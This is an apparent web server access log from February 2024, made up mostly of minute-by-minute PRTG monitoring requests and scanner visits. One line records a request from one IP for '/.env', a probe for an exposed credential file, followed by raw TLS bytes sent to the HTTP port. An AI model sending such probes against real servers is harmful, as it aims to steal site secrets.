212.91.246.72 - - [04/Feb/2024:07:10:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
78.153.140.175 - - [04/Feb/2024:07:11:53 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.175 - - [04/Feb/2024:07:11:53 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
212.91.246.72 - - [04/Feb/2024:07:11:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:07:12:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:07:13:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.216.149.47 - - [04/Feb/2024:07:14:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [04/Feb/2024:07:14:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:07:15:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:07:16:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:07:17:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:07:18:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:07:19:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.102.61.80 - - [04/Feb/2024:07:20:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
212.91.246.72 - - [04/Feb/2024:07:20:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.97.210.231 - - [04/Feb/2024:07:21:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Feb/2024:07:21:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.102.61.80 - - [04/Feb/2024:07:22:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
94.102.61.80 - - [04/Feb/2024:07:22:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
212.91.246.72 - - [04/Feb/2024:07:22:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.102.61.80 - - [04/Feb/2024:07:23:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
94.102.61.80 - - [04/Feb/2024:07:23:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
212.91.246.72 - - [04/Feb/2024:07:23:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2024:07:24:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.102.61.80 - - [04/Feb/2024:07:25:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
94.102.61.80 - - [04/Feb/2024:07:25:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
212.91.246.72 - - [04/Feb/2024:07:25:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
